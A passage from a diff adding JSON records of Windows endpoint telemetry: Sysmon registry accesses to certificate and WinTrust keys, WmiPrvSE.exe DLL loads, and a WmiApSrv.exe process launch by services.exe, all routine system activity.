"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winsta.dll", + "image_path": "C:\\Windows\\System32\\winsta.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "utildll.dll", + "image_path": "C:\\Windows\\System32\\utildll.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "srvcli.dll", + "image_path": "C:\\Windows\\System32\\srvcli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 7720, + "ppid": 568, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "subtype": "create", + "timestamp": 131883573480880000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 